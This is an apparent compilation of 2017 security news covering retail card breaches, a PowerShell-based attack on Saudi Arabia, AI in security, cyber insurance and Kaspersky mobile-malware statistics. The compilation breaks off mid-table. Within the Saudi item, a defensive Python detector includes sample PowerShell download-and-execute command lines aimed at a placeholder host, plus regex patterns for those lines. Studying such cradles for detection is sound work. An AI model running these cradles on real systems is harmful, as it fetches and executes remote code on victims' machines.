- Cyber -

Last update 09.10.2017 12:44:39


Bulletproof Coffee Failed to Keep Hackers Out
28.11.2017 securityweek Cyber
Bulletproof 360, the Bellevue, Wash.-based company that offers Bulletproof coffee and dietary supplements, is having trouble keeping cybercriminals out of its systems. The firm has sent out several notifications in the past year informing customers that hackers may have obtained their personal and payment card information.

Bulletproof only has three physical stores in Seattle and Los Angeles, but many people buy the company’s products from its website, which appears to have been breached several times in the past year.

The company first discovered that hackers had broken into its website on February 23, 2017. An investigation revealed that cybercriminals had compromised Bulletproof’s e-commerce system and they may have obtained payment card data submitted by users who had made online purchases, including names, card numbers, expiration dates, and CVVs. The exposed data also included email addresses, physical addresses and phone numbers.

An initial investigation found that the hackers had access to Bulletproof’s systems from October 26, 2016 until January 31, 2017. However, the final forensics report revealed that the attackers actually had access until May 30, 2017, which triggered a second breach notification for the period between February and May 2017.

Bulletproof then initiated another internal investigation, which showed that hackers had compromised the checkout page on its website, bulletproof.com, in an effort to capture payment card data submitted by customers making online purchases. This time, the attackers appeared to have had access between August 28, 2017 and September 5, 2017.

In the notifications sent out on September 15, the company told customers that it had “implemented enhanced security measures, including installing a new website security platform, implementing a security information and event management system (SIEM), and implementing enhanced logging” in an effort to prevent future incidents.

However, the new security measures did not help much and this week Bulletproof started sending out a new round of data breach notifications. It turns out that cybercriminals may have also intercepted information submitted to the company via the checkout page on its website between May 20 and October 13, 2017, and October 15-19, 2017.

The company has promised to reimburse affected customers for costs incurred as a result of these breaches if their financial institution refuses to reimburse them. It remains to be seen if this is the last breach notice sent out by the company or if hackers will gain access to its systems once again – if they haven’t done so already.

UPDATE. Bulletproof has sent SecurityWeek the following statement:

We became aware of a security incident involving our ecommerce website after noticing unusual activity relating to customer online transactions. We then began an immediate investigation of our website, engaged three computer security firms to examine our systems for any signs of an issue, and notified law enforcement. Our investigation earlier determined that an unknown third party had compromised our e-commerce system, potentially affecting customer payment card information used for online transactions on Bulletproof’s e-commerce website from October 26, 2016 to May 30, 2017. Working with the security firms, we recently determined that payment card information used on our ecommerce website from October 26, 2016 through October 13, 2017 and from October 15-19, 2017 may have been compromised. We immediately removed the code and have notified potentially affected customers of the incident.

Protecting our customers’ information remains a top priority and we regret any inconvenience or concern this may cause our customers. We recognize the importance of protecting our customers’ payment card information. We are continuing to work with the three security firms to implement enhanced security measures to try to prevent a similar incident from happening in the future.

Artificial Intelligence is Important for Cybersecurity, But It’s Not Enough
24.11.2017 securityaffairs Cyber

The advent of Artificial Intelligence has brought with it a new scope for cybersecurity. Why is artificial intelligence important for cybersecurity?
In my last blog, I discussed AI and Big Data. Now, I am going to explain about AI and Cybersecurity.

The advent of Artificial Intelligence has brought with it a new scope for cybersecurity. After all, an intelligent security system is expected to overcome any sophisticated threats. However, many security experts believe that AI is a double-edged sword and hence it could become dangerous at an epic level if it gets into the wrong hands. Let us make a quick analysis on the unison between cybersecurity and AI.

Cybersecurity is the need of the day. As if we didn’t have enough to worry about with terrorists running wild – always looking to inflict damage – we now have to worry about Cybercriminals as well. And in many cases, they can be a lot more dangerous than your average terrorist.

The significance of having a perfect cybersecurity strategy or solution has grown over the years. All the credit goes to the proliferation of smart devices on the Internet. Also, because of the growing endpoints that are always connected to the cyberspace, cybercriminals now have a plethora of opportunities to infiltrate devices.


Not only do hackers have more entry points to breach, but they also have more sophisticated tools to penetrate even into highly-secured devices or networks. How are they doing it? By mass producing sophisticated malware.

According to the 22nd threat report by Symantec, over 300 million malware samples were detected in 2016 alone. Not only this! John, a contributor at thebestvpn, shared the shocking statistic that one in every 131 emails contains malware. The massive figure presents quite a shocking blow to businesses, who then rush to come up with a more potent cybersecurity solution.

Moreover, we can’t ignore the fact that with the passage of time, cybercriminals have become smarter and more adept at countering traditional security practices. A survey conducted in 2017 of 70 professional hackers and pen testers found that 60% of hackers claim they can compromise a system within just 6 hours. Plus, over 80% of the hackers and testers said they could remain hidden from the network for 100 days after stealing sensitive data.

To combat such threats, we need to come up with a disruptive security technology that is not only efficient, but also proactive, faster and more intelligent. One such disruption that can prove itself an ideal security solution is Artificial Intelligence (AI).

Artificial Intelligence & Cybersecurity: A Perfect Unison or a Calamity

When we talk about Artificial Intelligence, the first thing that pops into our mind are technologies like Tesla’s self-driving cars or the Amazon Echo. This is because we take AI only as a “Buzzword” and nothing else.

Regardless, AI can offer more firepower when it comes to cybersecurity. It can cover the lack of manpower that we see in this highly complex field. Likewise, it can run things faster and hence detect threats before they could compromise a system and inflict damage.

Although there is a lot of potential in Artificial Intelligence for tackling complex cyber threats for good, there are some aspects that make it a double-edged sword. Before we move on to the other aspects of AI, let’s take a look at why it seems to be a great cybersecurity tool.

The Significance of AI as a Security Solution

IT experts at a company have a lot on their hands to monitor and analyze. They are always challenged with sifting through loads of security logs and activities, finding activity that could pose a serious threat, and coming up with mitigation strategies to contain it.

Moreover, there are weeks and months of logs that need to be scrutinized and vetted for security purposes. Identifying any abnormality in such vast amount of data and then formulating the right solution require not only more manpower but also more tools and resources.

However, an AI-powered machine can greatly assist IT personnel in monitoring, tracking and detecting anomalies efficiently.

Ryan Permeh, Cylance Chief Scientist, said in an online interview conducted by CSOOnline, “Historically, an AV researcher might see 10,000 viruses in a career. Today there are over 700,000 per day.” He further states that his security firm uses AI to tackle such attacks.

Apart from that, AI as a security tool can help with the lack of manpower that the cybersecurity industry is currently facing. Over 40% of organizations claim that they suffer from a “problematic shortage” of talent in cybersecurity.

Shahid Shah, the CEO of Netspective Communications, claims that there is a lot of skill shortage in different cybersecurity areas such as advanced malware prevention, compliance, IDS/IPS, identity and access management, etc.

Shah further states that by implementing AI, security firms can depend on “computers to do the grunt work and leave humans to the decision-making.”

Why AI Currently Isn’t a ‘Perfect’ Cybersecurity Solution

If AI can be used to shield our systems or networks from cyber-attacks, it is rational to expect the technology to be used for more attacks as well. Soon, when AI becomes more automated and developed, we might see more sophisticated cyber-attacks carried out by intelligent malware or viruses.

In fact, Endgame’s security expert, Hyrum Anderson, proved just that at DEF CON 2017. The team demonstrated an intelligent application that can re-engineer malware and make it undetectable even to a smart antivirus. The group of researchers succeeded in circumventing the protective layers of the AI-powered antivirus with its AI-powered malware 16% of the time.

The research was conducted to show that even AI can have blind spots that could be used to compromise systems.

The demonstration Hyrum Anderson presented isn’t the only research that indicates the negative implications of relying solely on AI. In fact, another study conducted by a security firm, Cylance, predicts AI “weaponization” soon.

According to the research, 62% of security experts believe that AI-powered cyber-attacks will increase in the near future, and hence the technology will be used as an intelligent cyber weapon.

“While AI may be the best hope for slowing the tide of cyberattacks and breaches, it may also create more advanced attacker tactics in the short-term,” says Cylance.

Final Say

AI-powered systems may reinforce our cybersecurity infrastructure, enabling our workforce to detect, contain, mitigate or stop cyber threats. However, relying solely on an intelligent technology that could be molded at our will can be dangerous. Plus, an AI-enabled attack may prove to be detrimental at an epidemic level.

Advanced cyber attack hits Saudi Arabia to disrupt government computers
24.11.2017 securityaffairs Cyber

Saudi Arabia announced that it had detected an “advanced” cyber attack targeting the kingdom with the intent to disrupt government computers.
On Monday, Saudi authorities announced that they had detected an “advanced” cyber attack targeting the kingdom. According to the experts at the Saudi National Cyber Security Centre, the attackers aimed to disrupt government computers.

The attackers leveraged PowerShell, but at the time of writing government experts had not commented on the source of the attack.

PowerShell is extremely powerful, and attackers are increasingly using it in their attack chains. PowerShell ships by default with the Microsoft Windows OS, so it is readily available on victim machines for attackers to abuse.

“Powershell is Predominantly used as a downloader”

The most prominent use of PowerShell observed in in-the-wild attacks is to download a malicious file from a remote location to the victim machine and execute it using cmdlets such as Start-Process, Invoke-Item or Invoke-Expression (alias IEX), or to download the content of the remote file directly into the memory of the victim machine and execute it from there.
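The download-and-execute pattern described above is also what a defender looks for in PowerShell telemetry: with Script Block Logging enabled, Windows records the executed script text as Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log, and command lines are visible in process-creation events. The following is an added example, not code from the article or from the Saudi NCSC: a small Python scorer that flags command lines combining a remote fetch (DownloadString, DownloadFile, Invoke-WebRequest) with execution (Invoke-Expression/IEX, Start-Process, Invoke-Item) or with evasion switches, and that decodes a -EncodedCommand argument before scoring it. The indicator names, weights, threshold and sample command lines are all constructed for this example, and the host names are placeholders.

```python
import base64
import re
from dataclasses import dataclass

# Indicators of PowerShell "download-and-execute" behaviour, weighted by how
# strongly each one signals a download cradle. Names and weights are ours (hypothetical).
INDICATORS = [
    ("invoke_expression", re.compile(r"\b(Invoke-Expression|IEX)\b", re.I), 3),
    ("remote_download", re.compile(
        r"\b(DownloadString|DownloadFile|Invoke-WebRequest|IWR|Net\.WebClient)\b", re.I), 3),
    ("execute_file", re.compile(r"\b(Start-Process|Invoke-Item)\b", re.I), 2),
    ("encoded_command", re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", re.I), 2),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I), 1),
    ("no_profile", re.compile(r"-nop(?:rofile)?\b", re.I), 1),
]

# Command lines scoring at or above this are reported (threshold chosen for this example).
THRESHOLD = 4

# Captures the base64 blob that follows -e / -ec / -enc / -EncodedCommand.
ENCODED_ARG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


@dataclass
class Finding:
    line_no: int
    score: int
    matched: list
    text: str


def decode_encoded_command(text):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE),
    or None if the line carries none or the blob does not decode cleanly."""
    m = ENCODED_ARG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command(text):
    """Score one command line. An encoded command is decoded and scored too,
    so a cradle hidden behind base64 is still seen."""
    decoded = decode_encoded_command(text)
    haystacks = [text] + ([decoded] if decoded else [])
    matched = [name for name, rx, _ in INDICATORS if any(rx.search(h) for h in haystacks)]
    score = sum(w for name, _, w in INDICATORS if name in matched)
    return score, matched


def scan_log(lines, threshold=THRESHOLD):
    """Return a Finding for every line whose score reaches the threshold."""
    findings = []
    for n, line in enumerate(lines, 1):
        score, matched = score_command(line)
        if score >= threshold:
            findings.append(Finding(n, score, matched, line.strip()))
    return findings


def _encode_ps(cmd):
    # Builds the -EncodedCommand form (UTF-16LE, then base64) for the constructed sample below.
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines (not real telemetry); example.invalid is a placeholder host.
_ENCODED_SAMPLE = _encode_ps(
    'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/p.ps1")')
SAMPLE_LOG = [
    "powershell.exe -Command Get-Service | Where-Object Status -eq Running",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/x.ps1')\"",
    "powershell.exe -Command \"(New-Object Net.WebClient).DownloadFile("
    "'http://example.invalid/a.exe','C:\\Users\\Public\\a.exe'); "
    "Start-Process C:\\Users\\Public\\a.exe\"",
    "powershell.exe -enc " + _ENCODED_SAMPLE,
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: score {f.score} {f.matched}\n  {f.text}")
```

The two benign administrative lines score zero, while the three cradle variants (in-memory IEX, download-to-disk plus Start-Process, and the base64-encoded form) all cross the threshold. Weighting the fetch and the execution indicators highest, and only adding points for switches such as -nop or -w hidden, keeps ordinary scripts that merely set an execution policy or run a file from being flagged on their own.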

Back to the attacks that hit Saudi computers, the NCSC speculates the involvement of an APT that used spear phishing attacks to infiltrate computers in the Kingdom.

“The NCSC has detected a new Advanced Persistent Threat (APT) that is targeting Saudi Arabia,” the agency said in a statement.

Saudi Arabia has been targeted several times by APT groups; the most clamorous attack was conducted with the Shamoon wiper in 2012 against computers in the Saudi energy sector.

Computers at Saudi Aramco, one of the world’s biggest oil companies, were disrupted by Shamoon in what is believed to be the country’s worst cyber attack yet.

In the attack against Saudi Aramco, Shamoon wiped data on over 30,000 computers and overwrote the hard drive MBR (Master Boot Record) with an image of a burning US flag.

The first team to discover the malware was Kaspersky Lab, which had analyzed some instances of the threat and linked them to the “wiper agent” because of a module containing a string with “wiper” as part of its name.

Early this year, Saudi authorities warned of a new wave of attacks that leveraged the Shamoon 2 malware targeting the country.

In January, the Saudi Arabian labor ministry had been attacked and also a chemical firm reported a network disruption.


According to security experts, the threat actor behind the Shamoon attacks was likely working on behalf of the Iranian government in 2012.

ERPScan Launches AI-Driven SAP Security Platform
22.11.2017 securityweek Cyber
ERPScan, a company that specializes in security solutions for SAP and Oracle enterprise resource planning (ERP) products, announced this week the launch of a new AI-driven cybersecurity platform for SAP systems.

The new product, ERPScan SMART Cybersecurity Platform for SAP, is designed to help organizations prevent, detect, and respond to threats targeting their SAP systems.

The platform’s assessment module allows security teams to identify vulnerabilities, custom code issues, misconfigurations, and segregation of duties (SoD) violations that could introduce risks. The prevention component enables employees to address issues and apply virtual patches.

The SMART Cybersecurity Platform for SAP includes modules for detecting malware and other malicious activity, and helps incident response teams quickly obtain information needed to contain a breach. The product also provides C-level executives and managers a comprehensive view of their organization’s security posture.

According to ERPScan, the platform leverages machine learning, specifically deep learning, to create a baseline for normal user behavior, which it then uses to detect potentially malicious activity carried out by both insiders and external entities.

The new platform combines the functionality of existing ERPScan SAP tools with machine learning and new modules for detection, response and monitoring.

“This solution is a real breakthrough for us,” said Alexander Polyakov, founder and CTO of ERPScan. “We spent the last two years on developing a solution that would be able to not only cover all areas of SAP cybersecurity, but also be intuitive by adding machine learning and adaptive interfaces. Our secret team of data scientists and machine learning experts battled with the experienced Research team and taught the system to detect advanced attacks and anomalous user behavior. Now we are ready to present the new generation of SAP cybersecurity products, and it's so exciting.”

Polyakov told SecurityWeek that the product is currently being tested by some early adopters, and expects it to become generally available in the second half of January 2018.

ERPScan has made significant contributions to improving SAP security, not only through its products, but also by informing the vendor of many vulnerabilities discovered by its researchers.

A massive cyber attack hit the Algerian state telecom operator Algerie Telecom
21.11.2017 securityaffairs Cyber

The Algerian state telecom operator Algerie Telecom was hit by a series of cyber attacks aimed to hack and disrupt its system.
The Algerian state telecom operator Algerie Telecom confirmed on Friday that it was hit by a series of cyber attacks aimed to hack and disrupt its system.

The company was able to repel the attack and security services managed to identify and arrest the attackers.

At the time of writing, there are no further details about the attacks or the motivation of the hackers.

According to a statement issued by the company, its staff was able to protect the operational infrastructure with the help of security services.


The rapid increase in the number of cyber attacks is raising concerns in Algeria especially over the security of recently launched services, such as the recently adopted e-payment system for electricity and water bills.

“Iman Houda Faraoun, Minister of Post, Information and Communication Technologies and Digital Economy, said the e-commerce bill, which had been approved by the Council of Ministers, will come into force as soon as it is approved by the parliament.” reported the Xinhuanet.com website.

“She promised that the e-commerce process will be fully protected, as e-financial transactions data, invoices and postal and bank cards will remain confidential.”

New Cyber Insurance Firm Unites Insurance With Cyber Intelligence
17.11.2017 securityweek Cyber
Mountain View, Calif-based cyber insurance firm At-Bay has emerged from stealth with a mission to shake up the status quo in cyber insurance. It brings a new model of security cooperation between insured and insurer to reduce risk and exposure to both parties.

At-Bay has partnered with HSB to bring to market a product to insure and defend organizations against cyber risks. It has closed a $6 million seed funding round, led by LightSpeed Venture Partners, with the participation of Shlomo Kramer and LocalGlobe.

"We founded At-Bay with the belief that controlling for cyber risk enables businesses to embrace technology and unlock great value to customers," said Rotem Iram, CEO and founder, At-Bay. "We match deep insights on a company's IT security with financial exposure that cyber attack vectors create, to enable insurance brokers and risk managers to more clearly and accurately assess and manage cyber risk. Our insurance products and supporting risk management services provide organizations with the confidence that they can take on the challenges of tomorrow."

Organizations are increasingly digitizing their businesses and becoming more reliant on technology. Technology is not secure and presents risk. Much of that risk is mitigated by security technology -- but each day there is further proof that security technology is not perfect. Risk managers need to consider that despite all the security technology employed to mitigate risk, there will always be residual risk that is best handled by risk transfer; that is, cyber insurance. Cyber insurance can be seen as a complement to cybersecurity technology used together to more fully mitigate the increasing risk of insecure digitization.

The primary problem for cyber insurers is that there is no established historical corpus of understanding for cybersecurity risk in the same way as there is for, say, motor or life insurance. Insurance works best with static risk, but cyber risk is intrinsically dynamic -- both the target (the IT infrastructure) and the attack methodology (attackers, tools, techniques, exploits and motivation) are continuously changing. Neither the insurer nor the insured currently understands how cybersecurity can be insured. For example, a survey by At-bay indicates that 50% of companies that do not have cyber insurance say it is because they do not know enough about cyber insurance.

At-bay proposes to solve this dilemma by uniting cybersecurity understanding with cyber insurance delivery within one supplier. At-bay's Rotem Iram points out that insurers have two advantages in this process. Firstly they are on the hook to pay out in case of loss; and secondly, as they develop their customer base, they become privy to a vast amount of information on cybersecurity and risk. The first provides the incentive for insurers to learn from the second, provided they have sufficient in-house understanding of cybersecurity threats, mitigations and response.

One of the problems for insurers is that each client's risk profile is continuously and unpredictably changing. "A rate could be set for a perceived risk; but two months later the NSA loses EternalBlue and the risk level changes," explains Iram. "The insurer cannot increase the premiums because it's not the insured's fault -- so he has to carry that increased risk at the same premium for another ten months. But if the insurer has sufficient understanding of the security posture of the client, he can tell the client about the new risk and how to mitigate it."

The interesting part about this example is that Iram would still pay out on the insurance even if he warned a company about a new risk and the company did nothing about it -- and was subsequently affected. "Yes, 100%," he told SecurityWeek. He accepts that he may be being a little naive, but firmly believes the future for cyber insurance is the evolution of a mutually collaborative relationship between insurer and insured. If the insurer gives good advice, and the insured responds, the insurer could give an end-of-year rebate.

Key to that collaboration is that the insured must trust the cybersecurity knowledge of the cybersecurity insurer. This is what has been lacking and is precisely what At-Bay seeks to bring to the table. Iram himself comes from a security background, and even spent five years with the Israel Defence Forces where he became head of the techno-intelligence group. He believes that if the insurer can demonstrate that it gives good advice, the insured will respond. "Nobody wants to get hacked. There's always a cost. There will always be some aspects that aren't or cannot be covered by insurance." Insurance is about reducing financial exposure as far as possible, not about eliminating it -- it cannot, for example, insure against loss of revenue caused by brand reputation damage (think Target), or loss of share value (think Equifax).

"We will be collecting data and using researchers to push the limits of our understanding of risk," he told SecurityWeek. "As we do that, we will be improving the quality of our product. Product quality is depressed today because insurance companies do not really understand the cybersecurity risk.

"Our team," he continued, "is split between Mountain View and Tel Aviv. Tel Aviv is where we have access to incredible security talent from the intelligence community. What we've built is a nation-state level reconnaissance capability based on what we've brought from the intelligence community. Our team and machine gathers intelligence from different sources, contextualizes it, and relates it to the customer infrastructure. Long story short, we scan the entire market of publicly available resources every month. Whenever we underwrite a company we have a history of how their technology stack and their security stack has looked and evolved over a period of time. This is a good part of the underwriting process, and helps us offer really good security advice to our clients."

The Equifax breach is an example of how this model would work. Rather than sit back and wait for the breach that would trigger an insurance claim, At-Bay would detect and inform any client with an unpatched vulnerability (such as the Struts vulnerability at Equifax) and explain how it should be remediated.

If At-Bay succeeds in its model of uniting security intelligence with insurance, it could shake up the entire cyber insurance market. If it does that, then both cybersecurity vendors and technology companies will need to look at their existing own third-party liability insurance. If more companies adopt cyber insurance, then more cybersecurity insurers will start trying to claw back their payouts from third parties who may be deemed to have been at fault in the breach.

Forever 21 Investigating Payment Card Breach
15.11.2017 securityweek  Cyber
Los Angeles-based fashion retailer Forever 21 informed customers on Tuesday that it has launched an investigation into a security incident involving payment systems.

The company said it recently learned from a third-party that credit and debit cards used at certain Forever 21 stores may have been compromised.

An investigation has been launched and a cybersecurity and forensics firm has been called in to assist. Forever 21 has provided few details about the incident, but noted that its investigation focuses on transactions made between March and October 2017.

The company has promised to share more information, including the list of affected stores and timeframes, in the upcoming period. It did, however, highlight that security mechanisms implemented in many of its stores made stealing payment card information difficult.

“Because of the encryption and tokenization solutions that Forever 21 implemented in 2015, it appears that only certain point of sale devices in some Forever 21 stores were affected when the encryption on those devices was not in operation,” the company said in a statement.

In the meantime, the company has advised customers to keep a close eye on credit card statements and immediately notify their bank of any unauthorized charges.

Forever 21 operates over 800 stores in 57 countries around the world. The company is the 5th largest specialty retailer in the United States.

“With its endless POS endpoints, the retail industry has always been a desirable target for cybercriminals,” said Mark Cline, a VP at managed security services firm Netsurion. “They know that if they can introduce malware into POS networks, they can make a decent amount of cash by selling credit card numbers on the dark web. With their millions of customers, large retailers, like Forever 21, have typically been the hardest hit. Companies must pay up to $172 per stolen record in clean-up costs.”

“If retail businesses haven’t hardened their IT and POS security, they should start now to protect themselves from POS malware, ransomware and other threats—especially as we move into the holiday shopping season,” Cline added. “They may be running anti-virus software and managed firewalls, but they may or may not be running a strong offense with active monitoring and threat detection.”

Forever 21 is not the only clothing retailer to report a payment card breach this year. Brooks Brothers and Buckle also reported finding malware on their payment systems. Eddie Bauer informed customers of a cyber intrusion last year.

IT threat evolution Q3 2017. Statistics
12.11.2017 Kaspersky Analysis  Cyber
According to KSN data, Kaspersky Lab solutions detected and repelled 277,646,376 malicious attacks from online resources located in 185 countries all over the world.

72,012,219 unique URLs were recognized as malicious by web antivirus components.

Attempted infections by malware that aims to steal money via online access to bank accounts were registered on 204,388 user computers.

Crypto ransomware attacks were blocked on 186,283 computers of unique users.

Kaspersky Lab’s file antivirus detected a total of 198,228,428 unique malicious and potentially unwanted objects.

Kaspersky Lab mobile security products detected:

1,598,196 malicious installation packages;
19,748 mobile banking Trojans (installation packages);
108,073 mobile ransomware Trojans (installation packages).
Mobile threats
Q3 events
The spread of the Asacub banker
In the third quarter, we continued to monitor the activity of the mobile banking Trojan Trojan-Banker.AndroidOS.Asacub that actively spread via SMS spam. Q3 saw cybercriminals carry out a major campaign to distribute the Trojan, resulting in a tripling of the number of users attacked. Asacub activity peaked in July, after which there was a decline in the number of attacks: in September we registered almost three times fewer attacked users than in July.

Number of unique users attacked by Trojan-Banker.AndroidOS.Asacub in Q2 and Q3 2017

New capabilities of mobile banking Trojans
Q3 2017 saw two significant events in the world of mobile banking Trojans.

Firstly, the family of mobile banking Trojans Svpeng has acquired the new modification Trojan-Banker.AndroidOS.Svpeng.ae capable of granting all the necessary rights to itself and stealing data from other applications. To do this, it just needs to persuade the user to allow the Trojan to utilize special functions designed for people with disabilities. As a result, the Trojan can intercept text that a user is entering, steal text messages and even prevent itself from being removed.

Interestingly, in August we discovered yet another modification of Svpeng that uses special features. Only, this time the Trojan was not banking related – instead of stealing data, it encrypts all the files on a device and demands a ransom in bitcoins.

Trojan-Banker.AndroidOS.Svpeng.ag. window containing ransom demand

Secondly, the FakeToken family of mobile banking Trojans has expanded the list of apps it attacks. If previously representatives of this family mostly overlaid banking and some Google apps (e.g. Google Play Store) with a phishing window, it is now also overlaying apps used to book taxis, air tickets and hotels. The aim of the Trojan is to harvest data from bank cards.

The growth of WAP billing subscriptions
In the third quarter of 2017, we continued to monitor the increased activity of Trojans designed to steal users’ money via subscriptions. To recap, these are Trojans capable of visiting sites that allow users to pay for services by deducting money from their mobile phone accounts. These Trojans can usually click buttons on such sites using special JS files, and thus make payments without the user’s knowledge.

Our Top 20 most popular Trojan programs in Q3 2017 included three malware samples that attack WAP subscriptions. They are Trojan-Dropper.AndroidOS.Agent.hb and Trojan.AndroidOS.Loapi.b in fourth and fifth, and Trojan-Clicker.AndroidOS.Ubsod.b in seventh place.

Mobile threat statistics
In the third quarter of 2017, Kaspersky Lab detected 1,598,196 malicious installation packages, which is 1.2 times more than in the previous quarter.

Number of detected malicious installation packages (Q4 2016 – Q3 2017)

Distribution of mobile malware by type

Distribution of new mobile malware by type (Q2 and Q3 2017)

RiskTool (53.44%) demonstrated the highest growth in Q3 2017, with its share increasing by 12.93 percentage points (p.p.). The majority of all installation packages discovered belonged to the RiskTool.AndroidOS.Skymobi family.

Trojan-Dropper malware (10.97%) came second in terms of growth rate: its contribution increased by 6.29 p.p. Most of the installation packages are detected as Trojan-Dropper.AndroidOS.Agent.hb.

The share of Trojan-Ransom programs, which was first in terms of the growth rate in the first quarter of 2017, continued to fall and accounted for 6.69% in Q3, which is 8.4 p.p. less than the previous quarter. The percentage of Trojan-SMS malware also fell considerably to 2.62% – almost 4 p.p. less than in Q2.

In Q3, Trojan-Clicker malware broke into this rating after its contribution increased from 0.29% to 1.41% in the space of three months.

TOP 20 mobile malware programs
Please note that this rating of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware.

Verdict % of attacked users*
1 DangerousObject.Multi.Generic 67.14
2 Trojan.AndroidOS.Boogr.gsh 7.52
3 Trojan.AndroidOS.Hiddad.ax 4.56
4 Trojan-Dropper.AndroidOS.Agent.hb 2.96
5 Trojan.AndroidOS.Loapi.b 2.91
6 Trojan-Dropper.AndroidOS.Hqwar.i 2.59
7 Trojan-Clicker.AndroidOS.Ubsod.b 2.20
8 Backdoor.AndroidOS.Ztorg.c 2.09
9 Trojan.AndroidOS.Agent.gp 2.05
10 Trojan.AndroidOS.Sivu.c 1.98
11 Trojan.AndroidOS.Hiddapp.u 1.87
12 Backdoor.AndroidOS.Ztorg.a 1.68
13 Trojan.AndroidOS.Agent.ou 1.63
14 Trojan.AndroidOS.Triada.dl 1.57
15 Trojan-Ransom.AndroidOS.Zebt.a 1.57
16 Trojan-Dropper.AndroidOS.Hqwar.gen 1.53
17 Trojan.AndroidOS.Hiddad.an 1.48
18 Trojan.AndroidOS.Hiddad.ci 1.47
19 Trojan-Banker.AndroidOS.Asacub.ar 1.41
20 Trojan.AndroidOS.Agent.eb 1.29
* Percentage of unique users attacked by the malware in question, relative to all users of Kaspersky Lab’s mobile security product that were attacked.

First place was occupied by DangerousObject.Multi.Generic (67.14%), the verdict used for malicious programs detected using cloud technologies. This is basically how the very latest malware is detected.

As in the previous quarter, Trojan.AndroidOS.Boogr.gsh (7.52%) came second. This verdict is issued for files recognized as malicious by our system based on machine learning.

Trojan.AndroidOS.Hiddad.ax (4.56%) was third. The main purpose of this Trojan is to open and click advertising links received from the C&C. The Trojan requests administrator rights to prevent its removal.

Trojan-Dropper.AndroidOS.Agent.hb (2.96%) climbed from sixth in Q2 to fourth this quarter. This Trojan decrypts and runs another Trojan – a representative of the Loapi family. One of them – Trojan.AndroidOS.Loapi.b – came fifth in this quarter’s Top 20. This is a complex modular Trojan whose main malicious component needs to be downloaded from the cybercriminals’ server. We can assume that Trojan.AndroidOS.Loapi.b is designed to steal money via paid subscriptions.

Trojan-Dropper.AndroidOS.Hqwar.i (2.59%), the verdict used for Trojans protected by a certain packer/obfuscator, fell from fourth to sixth. In most cases, this name indicates representatives of the FakeToken and Svpeng mobile banking families.

In seventh was Trojan-Clicker.AndroidOS.Ubsod.b, a small basic Trojan that receives links from a C&C and opens them. We wrote about this family in more detail in our review of Trojans that steal money using WAP subscriptions.

Trojan Backdoor.AndroidOS.Ztorg.c came eighth. This is one of the most active advertising Trojans that uses superuser rights. In the third quarter of 2017, our Top 20 included eight Trojans that try to obtain or use root rights and which make use of advertising as their main means of monetization. Their goal is to deliver ads to the user more aggressively, applying (among other methods) hidden installation of new advertising programs. At the same time, superuser privileges help them ‘hide’ in the system folder, making it very difficult to remove them. It’s worth noting that the quantity of this type of malware in the Top 20 has been decreasing (in Q1 2017, there were 14 of these Trojans in the rating, while in Q2 the number was 11).

Trojan.AndroidOS.Agent.gp (2.05%), which steals money from users making calls to premium numbers, rose from fifteenth to ninth. Due to its use of administrator rights, it resists attempts to remove it from an infected device.

Occupying fifteenth this quarter was Trojan-Ransom.AndroidOS.Zebt.a, the first ransom Trojan in this Top 20 rating in 2017. This is a fairly simple Trojan whose main goal is to block the device with its window and demand a ransom. Zebt.a tends to attack users in Europe and Mexico.

Trojan.AndroidOS.Hiddad.an (1.48%) fell to sixteenth after occupying second and third in the previous two quarters. This piece of malware imitates various popular games or programs. Interestingly, once run, it downloads and installs the application it imitated. In this case, the Trojan requests administrator rights to withstand removal. The main purpose of Trojan.AndroidOS.Hiddad.an is the aggressive display of adverts. Its main ‘audience’ is in Russia.

The geography of mobile threats

The geography of attempted mobile malware infections in Q3 2017 (percentage of all users attacked)

Top 10 countries attacked by mobile malware (ranked by percentage of users attacked):

Country* % of attacked users**
1 Iran 35.12
2 Bangladesh 28.30
3 China 27.38
4 Côte d’Ivoire 26.22
5 Algeria 24.78
6 Nigeria 23.76
7 Indonesia 22.29
8 India 21.91
9 Nepal 20.78
10 Kenya 20.43
* We eliminated countries from this rating where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab’s mobile security product in the country.

For the third quarter in a row Iran was the country with the highest percentage of users attacked by mobile malware – 35.12%. Bangladesh came second, with 28.3% of users there encountering a mobile threat at least once during Q3. China (27.38%) followed in third.

Russia (8.68%) came 35th this quarter (vs 26th place in Q2), France (4.9%) was 59th, the US (3.8%) 67th, Italy (5.3%) 56th, Germany (2.9%) 79th, and the UK (3.4%) 72nd.

The safest countries were Georgia (2.2%), Denmark (1.9%), and Japan (0.8%).

Mobile banking Trojans
Over the reporting period we detected 19,748 installation packages for mobile banking Trojans, which is 1.4 times fewer than in Q2 2017.

Number of installation packages for mobile banking Trojans detected by Kaspersky Lab solutions (Q4 2016 – Q3 2017)

Trojan-Banker.AndroidOS.Asacub.ar became the most popular mobile banking Trojan in Q3, replacing the long-term leader Trojan-Banker.AndroidOS.Svpeng.q. These mobile banking Trojans use phishing windows to steal credit card data and logins and passwords for online banking accounts. In addition, they steal money via SMS services, including mobile banking.

Geography of mobile banking threats in Q3 2017 (percentage of all users attacked)

Top 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked):

Country* % of attacked users**
1 Russia 1.20
2 Uzbekistan 0.40
3 Kazakhstan 0.36
4 Tajikistan 0.35
5 Turkey 0.34
6 Moldova 0.31
7 Ukraine 0.29
8 Kyrgyzstan 0.27
9 Belarus 0.26
10 Latvia 0.23
* We eliminated countries from this rating where the number of users of Kaspersky Lab’s mobile security product is relatively low (under 10,000).
